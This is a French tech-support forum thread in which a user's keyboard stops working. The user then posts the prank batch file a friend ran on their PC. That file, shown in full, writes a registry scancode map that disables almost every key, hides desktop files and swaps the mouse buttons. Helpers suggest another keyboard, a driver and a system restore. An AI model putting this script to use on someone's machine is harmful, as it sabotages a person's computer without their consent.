Mon clavier n'ecrit plus q'une seul lettre [Résolu/Fermé]

Signaler
Messages postés
5
Date d'inscription
lundi 27 mars 2017
Statut
Membre
Dernière intervention
28 mars 2017
-
Messages postés
180117
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
4 octobre 2020
-
Bonjour, mon clavier ne marche plus :toutes les lettres ne fonctionnent plus sauf la lettre permettant d’écrire < et> . mon clavier est bien allumer car le truc permettant de dire si num est activé brille. j'ai essayer plusieurs fois de débrancher et rebrancher le clavier sans succès . dans périphérique, sa dit que le clavier fonctionne bien . quelqu’un peut m'aider svp ? merci

7 réponses

Messages postés
5021
Date d'inscription
samedi 29 mars 2008
Statut
Contributeur
Dernière intervention
24 avril 2017
1 845
Bonjour,
dans votre cas, essayez avec un autre clavier.
Visiblement, le vôtre a un problème.
Si vous avez toujours le problème avec le nouveau clavier cela indique que le problème se situe au niveau du PC.
CDLT
Messages postés
5
Date d'inscription
lundi 27 mars 2017
Statut
Membre
Dernière intervention
28 mars 2017

j'ai retrouver le responsable : un ami ma fait une mauvaise blague et a executer un fichier bat sur mon ordi pendant mon absence voici le code si ca peut aider:

@echo off
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg
start("nokeyboard.reg")
@echo off
:: Hide desktop
attrib +s +h /d C:\users\%username%\desktop\*
@echo off
:: Swap Mouse Buttons
RUNDLL32 USER32.DLL,SwapMouseButton
J'ai déjà esseyer et ça ne marche toujours pas
Messages postés
5021
Date d'inscription
samedi 29 mars 2008
Statut
Contributeur
Dernière intervention
24 avril 2017
1 845
Rendez vous sur cette page:
http://drivers.synaptics.com/Synaptics_v19_0_19_1__C__x86-x64__Win10__Signed__MS_Win10_UXUI_PS2_SMbus.zip
Installer le programme
dîtes si cela fonctionne.
Sinon, tentez de restaurer votre système avec un point de restauration antérieur au problème.
CDLT
Messages postés
5021
Date d'inscription
samedi 29 mars 2008
Statut
Contributeur
Dernière intervention
24 avril 2017
1 845
Mon niveau en programmation n'atteint pas celui que j'ai en "hard"
Patientez un peu... une personne plus qualifiée va sûrement vous prendre en charge... désolé, nous avons tous nos limites !
Messages postés
5
Date d'inscription
lundi 27 mars 2017
Statut
Membre
Dernière intervention
28 mars 2017

je comprend bien sur . truc qui pourrait aussi ider quand je met verr maj sur mon clavier numerique , la partie maj de mon clavier se met a briller .
Messages postés
5
Date d'inscription
lundi 27 mars 2017
Statut
Membre
Dernière intervention
28 mars 2017

le probleme vient de windows j'ai vérifier
Messages postés
5021
Date d'inscription
samedi 29 mars 2008
Statut
Contributeur
Dernière intervention
24 avril 2017
1 845
Bon, j'ai fait quelques recherches.. RIEN !
Dans votre cas, je vous conseille de demander à votre "ami" de vous donner la solution.
CDLT

Messages postés
5
Date d'inscription
lundi 27 mars 2017
Statut
Membre
Dernière intervention
28 mars 2017

c'est bon le lendemain çà remarche comme par hasard ... sujet résolu
Messages postés
180117
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
4 octobre 2020
22 281
Salut,

Tente une restauration du système de Windows qui permet de revenir à un point de restauration antérieure (si disponible), afin de retrouver un Windows fonctionnel.
=> https://www.malekal.com//restauration-systeme-windows/
=> https://www.commentcamarche.net/informatique/windows/147-creer-et-utiliser-les-points-de-restauration-de-windows/

Pour cela :

Touche Windows + R
tape rstrui.exe et OK.
Laisse toi guider.